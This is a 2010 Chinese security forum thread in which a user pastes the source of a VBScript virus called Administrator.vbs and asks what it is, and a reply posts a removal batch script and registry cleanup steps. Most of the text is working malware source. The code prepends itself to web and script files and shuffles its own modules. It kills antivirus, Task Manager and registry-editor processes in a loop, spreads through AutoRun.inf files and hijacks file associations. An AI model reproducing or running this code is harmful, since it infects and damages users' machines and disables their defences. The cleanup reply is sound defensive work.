有请各位专家牛人进来看看这个到底是什么东东 bbs.ikaka.com

尘封DE笑颜 - 2010-1-22 21:19:00

这个文件在每个分区的磁盘根目录底下，我发现了吧它删除掉，然后接着后果就是磁盘上的内容全部都看不到了，但是能看到容量，也能通过存在的文件名直接运行，例如我知道D盘里有个SETUP.EXE 那么即使我看不到我在路径里输入这个地址还是能运行的，各位现在请看看并分析一下到底是什么

'Administrator4
'CEKFCRUKMUUPO2_21
Function IsxxxFile(fname)
IsxxxFile = False
If InStr(fname, "成人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "xxx")>0 Or _
InStr(fname, "xxx")>0 Or InStr(fname, "xxx")>0 Or InStr(fname, "xxx")>0 Or _
InStr(fname, "xxx")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "xxx")>0 Then
IsxxxFile = True
End If
End Function
Function Isinfected(buffer, ftype)
Isinfected = True
Select Case ftype
Case "hta", "htm" , "html" , "asp", "vbs"
If InStr(buffer, Head_V) = 0 Then
Isinfected = False
End If
Case Else
Isinfected = True
End Select
End Function
'UKICKELTSSR2_21
'CEKFCRUKMUUPO1_2
Sub ExeVbs_WebPage()
On Error Resume Next
Dim objfso, vbsCode, VbsCode_Virus
Set objfso = CreateObject(GetFSOName())
vbsCode = GetScriptCode("vbscript")
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
Call InvadeSystem(objfso, VbsCode_Virus)
Set objfso = Nothing
End Sub
Sub ExeVbs_Victim()
On Error Resume Next
Dim objfso, vbsCode, VbsCode_Virus
Set objfso = CreateObject(GetFSOName())
vbsCode = GetSelfCode(objfso, WScript.ScriptFullName)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Set objfso = Nothing
End Sub
'UKICKELTSSR1_2
'CEKFCRUKMUUPO2_15
Sub SetFileAttr(objfso, pathf)
Dim vf
Set vf = objfso.GetFile(pathf)
vf.Attributes = 6
End Sub
'UKICKELTSSR2_15
'CEKFCRUKMUUPO2_17
Function PreInstance()
On Error Resume Next
Dim num_cnt
Dim strComputer, objWMIService, colProcessList, objProcess
num_cnt = 0
PreInstance = False
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
For Each objProcess in colProcessList
If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
num_cnt = num_cnt + 1
End If
Next
If num_cnt>= 2 Then
PreInstance = True
End If
End Function
'UKICKELTSSR2_17
'CEKFCRUKMUUPO2_10
Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T)
On Error Resume Next
Dim d , dc
Set dc = objfso.Drives
For Each d In dc
If Cnt >= CntMax Then '
Exit For
End If
If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
'If d.DriveType = 1 Then
Call SearchFile(objfso, d.Path & "\", VbsCode_WebPage, VbsCode_Victim, T)
'End If
End If
Next
End Sub
'UKICKELTSSR2_10
'CEKFCRUKMUUPO2_11
Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T)
On Error Resume Next
Dim pfo, pf, pfi, ext
Dim psfo, ps
Set pfo = objfso.GetFolder(strPath)
Set pf = pfo.Files
For Each pfi In pf
If Cnt >= CntMax Then
Exit For
End If
ext = LCase(objfso.GetExtensionName(pfi.Path))
Select Case ext
Case "hta", "htm", "html", "asp", "vbs"
Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim, ext, T)
Case "mpg", "rmvb", "avi", "rm"
If IsxxxFile(pfi.Name) = True Then
pfi.Delete
End If
End Select
Next
Set psfo = pfo.SubFolders
For Each ps In psfo
If Cnt >= CntMax Then
Exit For
End If
Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T)
Next
End Sub
'UKICKELTSSR2_11
'CEKFCRUKMUUPO2_20
Function GetModelCode(vbsCode, N_ModelCode)
On Error Resume Next
Dim n, n1, buffer
buffer = vbsCode
If N_ModelCode>= 1 And N_ModelCode<= 9 Then
n = InStr(buffer, ModelHead & "1_" & N_ModelCode)
n1 = InStr(buffer, ModelTail & "1_" & N_ModelCode)
GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "1_" & N_ModelCode))
ElseIf N_ModelCode>= 10 And N_ModelCode<= 99 Then
n = InStr(buffer, ModelHead & "2_" & N_ModelCode)
n1 = InStr(buffer, ModelTail & "2_" & N_ModelCode)
GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "2_" & N_ModelCode))
ElseIf N_ModelCode>= 100 And N_ModelCode<= 999 Then
n = InStr(buffer, ModelHead & "3_" & N_ModelCode)
n1 = InStr(buffer, ModelTail & "3_" & N_ModelCode)
GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "3_" & N_ModelCode))
End If
End Function
'UKICKELTSSR2_20
'CEKFCRUKMUUPO2_24
Sub KillProcess(ProcessNames)
On Error Resume Next
Dim objShell, intReturn, name_exe
Set objShell = WScript.CreateObject("WScript.Shell")
strComputer = "."
Set objWMIServices = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
For Each ProcessName in ProcessNames
Set colProcessList = objWMIServices.Execquery(" Select * From win32_process where name = '" & ProcessName & "' ")
For Each objProcess in colProcessList
intReturn = objProcess.Terminate
Select Case intReturn
Case 2
name_exe = objProcess.Name
name_exe = Left(name_exe, Len(name_exe) -4)
objShell.Run "cmd.exe /c @tskill " & name_exe, 0, False
End Select
Next
Next
Set objShell = Nothing
End Sub
'UKICKELTSSR2_24
'CEKFCRUKMUUPO2_12
Sub InfectHead(strPath, fi, objfso, VbsCode_WebPage, VbsCode_Victim, ftype, T)
On Error Resume Next
Dim tso, buffer, strCode , Maxsize
Maxsize = 350000
If fi.Size< Maxsize Then
Set tso = objfso.OpenTextFile(strPath, 1, True)
buffer = tso.ReadAll()
tso.Close
If T = 0 Then
Select Case ftype
Case "hta", "htm", "html", "asp"
If Isinfected(buffer, ftype) = False Then
Set tso = objfso.OpenTextFile(strPath, 2, true)
strCode = MakeScript(VbsCode_WebPage, 0)
tso.Write strCode & VBCRLF & buffer
Cnt = Cnt + 1
End If
Case "vbs"
If Isinfected(buffer, ftype) = False Then
n = InStr(buffer , "Option Explicit")
If n<>0 Then
buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
Set tso = objfso.OpenTextFile(strPath, 2, true)
tso.Write vbsCode_Victim & VBCRLF & buffer
Cnt = Cnt + 1
Else
Set tso = objfso.OpenTextFile(strPath, 2, true)
tso.Write vbsCode_Victim & VBCRLF & buffer
Cnt = Cnt + 1
End If
End If
Case Else
'
'
End Select
ElseIf T = 1 Then
If Isinfected(buffer, ftype) = True Then
n = InStrRev(buffer , Tail_V)
If n<>0 Then
buffer = Replace(buffer, Tail_V, "", n, 1, 1)
Set tso = objfso.OpenTextFile(strPath, 2, True)
tso.Write strCode & VBCRLF & buffer
End If
End If
End If
End If
End Sub
'UKICKELTSSR2_12
'CEKFCRUKMUUPO2_18
Function IsOK(objfso, Now_V, path_f)
On Error Resume Next
Dim vf, p1, p2, p3
IsOK = False
Set vf = objfso.OpenTextFile(path_f, 1)
p1 = Trim(vf.ReadLine)
p2 = Trim(vf.ReadLine)
p3 = Trim(vf.ReadLine)
If StrComp(p1, "OK", 1) = 0 And StrComp(p2, Now_V, 1) = 0 Then
IsOK = True
End If
If p3 = "Admin" Then
MsgBox "You Are Admin!!! Your Computer Will Not Be Infected!!!"
IsOK = True
n = InputBox("0:退出； 1:监视系统； 2:传染文件", "SuperVirus脚本测试!")
If n = 0 Then
Wscript.Quit
ElseIf n = 1 Then
IsOK = True
ElseIf n = 2 Then
IsOK = False
End If
End If
End Function
'UKICKELTSSR2_18
'CEKFCRUKMUUPO2_19
Function GetVersion(objfso, path_v)
Dim FV, buffer
Set FV = objfso.OpenTextFile(path_v, 1)
buffer = FV.ReadAll()
GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1)
End Function
Function GetScriptCode(Languages)
On Error Resume Next
Dim soj
For Each soj In document.Scripts
If LCase(soj.Language) = Languages Then
Select Case LCase(soj.Language)
Case "vbscript"
GetScriptCode = soj.Text
Exit Function
Case "javascript"
GetScriptCode = soj.Text
Exit Function
End Select
End If
Next
End Function
Function GetSelfCode(objfso, FullPath_Self)
On Error Resume Next
Dim n, n1, buffer, Self
Set Self = objfso.OpenTextFile(FullPath_Self, 1)
buffer = Self.ReadAll
n = InStr(buffer, Head_V)
n1 = InstrRev(buffer, Tail_V)
buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1)
GetSelfCode = buffer
Self.Close
End Function
Function GetMainBody(vbsCode, Sum_ModelCode)
Dim i
For i = 2 To Sum_ModelCode
GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF
Next
End Function
'UKICKELTSSR2_19
'CEKFCRUKMUUPO2_23
Function MakeScript(strCode, T)
If T = 1 Then
MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(strCode, Sum_ModelCode) & VBCRLF & "</" & "SCRIPT>"
Else
MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & strCode & VBCRLF & "</" & "SCRIPT>"
End If
End Function

'UKICKELTSSR2_23
'CEKFCRUKMUUPO1_5
Sub MonitorSystem(objfso, vbsCode)
On Error Resume Next
Dim ProcessNames
ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
Do
Call KillProcess(ProcessNames)
Call InvadeSystem(objfso, vbsCode)
WScript.Sleep 5000
Loop
End Sub
'UKICKELTSSR1_5
'CEKFCRUKMUUPO1_9
Function ChangeModelOrder(vbsCode, Num_DNA)
On Error Resume Next
Dim DNA(), Array_vbsCode()
Dim i, Value, flag, j, buffer
ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
buffer = vbsCode
Randomize
For i = 1 To Num_DNA
Do
Value = Int((Num_DNA * Rnd) + 1)
flag = 1
For j = 1 To Num_DNA
If Value = DNA(j) Then
flag = 0
Exit For
End If
Next
Loop Until flag = 1
DNA(i) = Value
Next
For i = 1 To Num_DNA
Array_vbsCode(i) = GetModelCode(buffer, i)
Next
buffer = ""
For i = 1 To Num_DNA
buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
Next
ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
End Function
'UKICKELTSSR1_9
'CEKFCRUKMUUPO2_14
Function ReadOK(objfso, FullPath_OK)
On Error Resume Next
Dim vf, buffer
Set vf = objfso.OpenTextFile(FullPath_OK, 1)
buffer = vf.ReadAll
ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
End Function
Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
On Error Resume Next
Dim vf1
objfso.DeleteFile FullPath_OK, True
Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
vf1.Write "OK" & VBCRLF
vf1.WriteLine Date()
vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
Call SetFileAttr(objfso, FullPath_OK)
End Sub
'UKICKELTSSR2_14
'CEKFCRUKMUUPO1_6
Sub AutoRun(objfso, D, vbsCode)
On Error Resume Next
Dim path_autorun, path_vbs, inf_autorun
path_autorun = D & ":\AutoRun.inf"
path_vbs = D & ":\" & Name_V1
If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or GetVersion(objfso, path_vbs)<Version Then
If objfso.FileExists(path_autorun) = True Then
objfso.DeleteFile path_autorun, True
End If
If objfso.FileExists(path_vbs) = True Then
objfso.DeleteFile path_vbs, True
End If
Call CopyFile(objfso, vbsCode, path_vbs)
Call SetFileAttr(objfso, path_vbs)
inf_autorun = "[AutoRun]" & VBCRLF & "Shellexecute=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun=打开(&O)" & VBCRLF & "shell\AutoRun\command=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun1=资源管理器(&X)" & VBCRLF & "shell\AutoRun1\command=WScript.exe " & Name_V1 & " ""AutoRun"""
Call CopyFile(objfso, inf_autorun, path_autorun)
Call SetFileAttr(objfso, path_autorun)
End If
End Sub
'UKICKELTSSR1_6
'CEKFCRUKMUUPO1_1
On Error Resume Next
Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V
Dim ModelHead, ModelTail
Cnt = 0
CntMax = 1000
Version = "4"
Name_V1 = GetUserName() & ".vbs"
FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向
FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令
FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
Sum_ModelCode = 26
Head_V= GetHeadTail(0)
Tail_V= GetHeadTail(1)
ModelHead="'CEKFCRUKMUUPO"
ModelTail="'UKICKELTSSR"
Call VirusMain()
Sub VirusMain()
On Error Resume Next
Call ExeVbs_Virus()
End Sub
'UKICKELTSSR1_1
'CEKFCRUKMUUPO2_25
Sub DeleteReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
tmps.RegDelete strkey
Set tmps = Nothing
End Sub
Function ReadReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
ReadReg = tmps.RegRead(strkey)
Set tmps = Nothing
End Function
Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
If vtype = "" Then
tmps.RegWrite strkey, Value
Else
tmps.RegWrite strkey, Value, vtype
End If
Set tmps = Nothing
End Sub
'UKICKELTSSR2_25
'CEKFCRUKMUUPO2_22
Function GetSFolder(p)
Dim objfso
Set objfso = CreateObject(GetFSOName())
GetSFolder = objfso.GetSpecialFolder(p) & "\"
Set objfso = Nothing
End Function
Function GetUserName()
On Error Resume Next
Dim Value , UserName
Value = "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}\Username"
UserName = ReadReg(Value)
If UserName = "" Then
GetUserName = "Administrator"
Else
GetUserName = UserName
End If
End Function
Function GetFSOName()
On Error Resume Next
Dim Value , UserName
Value = "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID\"
UserName = ReadReg(Value)
If UserName = "" Then
GetUserName = "Scripting.FileSystemObject"
Else
GetFSOName = UserName
End If
End Function
Function GetHeadTail(l)
Dim Str , buffer
If l = 0 Then
GetHeadTail = "'" & GetUserName()
Else
buffer = GetUserName()
Str = ""
For i = 1 To Len(buffer)
Str = Mid(buffer, i, 1) & Str
GetHeadTail = "'" & Str
Next
End If
End Function
'UKICKELTSSR2_22
'CEKFCRUKMUUPO1_3
Sub ExeVbs_Virus()
On Error Resume Next
Dim objfso, objshell, FullPath_Self, Name_Self, Names
Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
Dim Order, Order_Order, Order_Para
Dim vbsCode , VbsCode_Virus, VbsCode_WebPage, VbsCode_Victim , MainBody
Set objfso = CreateObject(GetFSOName())
Set objshell = CreateObject("WScript.Shell")
FullPath_Self = WScript.ScriptFullName
Name_Self = WScript.ScriptName
Names = Array("CEKFCRUKMUUPO", "UKICKELTSSR")
Set oArgs = WScript.Arguments
ArgNum = 0
Do While ArgNum < oArgs.Count
Para_V = Para_V & " " & oArgs(ArgNum)
ArgNum = ArgNum + 1
Loop
SubPara_V = LCase(Right(Para_V, 3))
Select Case SubPara_V
Case "run"
RunPath = Left(FullPath_Self, 2)
Call Run(RunPath)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "txt", "log"
RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
Call Run(RunPath)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "reg"
Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF
因为限制内容不全全部的在下面的附件里右键用记事本打开

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; iCafeMedia)

附件: Administrator.rar

夲號ヱ被ジ盜 - 2010-1-22 23:12:00

英文版的清除工具：
【仅仅是截止到当天的病1毒库】
不要理解成卡巴= =！
虽然是卡巴出品....
http://devbuilds.kaspersky-labs.com/devbuilds/AVPTool/

或者
以下复制到TXT文档
改成1.bat运行

@ECHO OFF
cls
echo.
echo ***************************************
echo * administrator.vbs专杀工具——oldjun *
echo *Http://gehailinterry.bokee.com*
echo ***************************************
echo.
echo 正在关闭Script进程...
taskkill /im WScript.exe /f
taskkill /im cscript.exe /f
echo 关闭成功...
echo %username%
echo 正在删除相关文件...
@if exist %windir%\%username%.vbs del %windir%\%username%.vbs /f/q/a
@if exist %windir%\system32\%username%.vbs del %windir%\system32\%username%.vbs /f/q/a
@if exist %windir%\system32\%username%.ini del %windir%\system32\%username%.ini /f/q/a
@if exist c:\autorun.inf del c:\autorun.inf /f/q/a
@if exist d:\autorun.inf del d:\autorun.inf /f/q/a
@if exist e:\autorun.inf del e:\autorun.inf /f/q/a
@if exist f:\autorun.inf del f:\autorun.inf /f/q/a
@if exist g:\autorun.inf del g:\autorun.inf /f/q/a
@if exist h:\autorun.inf del h:\autorun.inf /f/q/a
@if exist c:\%username%.vbs del c:\%username%.vbs /f/q/a
@if exist d:\%username%.vbs del d:\%username%.vbs /f/q/a
@if exist e:\%username%.vbs del e:\%username%.vbs /f/q/a
@if exist f:\%username%.vbs del f:\%username%.vbs /f/q/a
@if exist g:\%username%.vbs del g:\%username%.vbs /f/q/a
@if exist h:\%username%.vbs del h:\%username%.vbs /f/q/a
echo 删除成功...
echo 正在修改注册表...
echo 显示隐藏文件
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t reg_dword /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 1 /f
echo 关闭自动播放
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t reg_dword /d 1 /f
echo 删除启动项
reg delete "HKCU\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /f
echo 恢复文件关联
reg add "HKLM\SOFTWARE\Classes\txtfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "%%SystemRoot%%\system32\NOTEPAD.EXE %%1" /f
reg add "HKLM\SOFTWARE\Classes\regfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "regedit.exe "%%1"" /f
reg add "HKLM\SOFTWARE\Classes\chm.file\shell\open\command" /ve /t REG_EXPAND_SZ /d ""hh.exe" %%1" /f
reg add "HKLM\SOFTWARE\Classes\hlpfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "winhlp32.exe %%1" /f
reg add "HKLM\SOFTWARE\Classes\exefile\shell\open\command" /ve /t REG_SZ /d ""%%1" %%*" /f
echo 修改成功...
cls
echo.
echo ****************
echo * 清除完毕 ! *
echo ****************
echo.
echo. & pause

或者...

开始
运行
secpol.msc /s

软件限制策略
新建规则
输入你那程序路径

%SystemRoot%\System32\WScript.exe

重启

启动项目
注册表
如下删除：
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<load><C:\WINDOWS\system32\Administrator.vbs> []
请修复文件关联：
请修复文件夹选项
有被替换的windows文件

文件关联
.TXT Error. [%SystemRoot%\System32\WScript.exe "C:\WINDOWS\Administrator.vbs" %1 %* ]

.REG Error. [%SystemRoot%\System32\WScript.exe "C:\WINDOWS\Administrator.vbs" %1 %* ]

.CHM Error. [%SystemRoot%\System32\WScript.exe "C:\WINDOWS\Administrator.vbs" %1 %* ]
.HLP Error. [%SystemRoot%\System32\WScript.exe "C:\WINDOWS\Administrator.vbs" %1 %* ]

==================================
Autorun.inf
[C:\]
[AutoRun]
Shellexecute=WScript.exe Administrator.vbs "AutoRun"
shell\AutoRun=打开(&O)
shell\AutoRun\command=WScript.exe Administrator.vbs "AutoRun"
shell\AutoRun1=资源管理器(&X)
shell\AutoRun1\command=WScript.exe Administrator.vbs "AutoRun"
[D:\]
[AutoRun]
Shellexecute=WScript.exe Administrator.vbs "AutoRun"
shell\AutoRun=打开(&O)
shell\AutoRun\command=WScript.exe Administrator.vbs "AutoRun"
shell\AutoRun1=资源管理器(&X)
shell\AutoRun1\command=WScript.exe Administrator.vbs "AutoRun"

运行不全
不知道你的有没有这个提示

瑞星卡卡安全论坛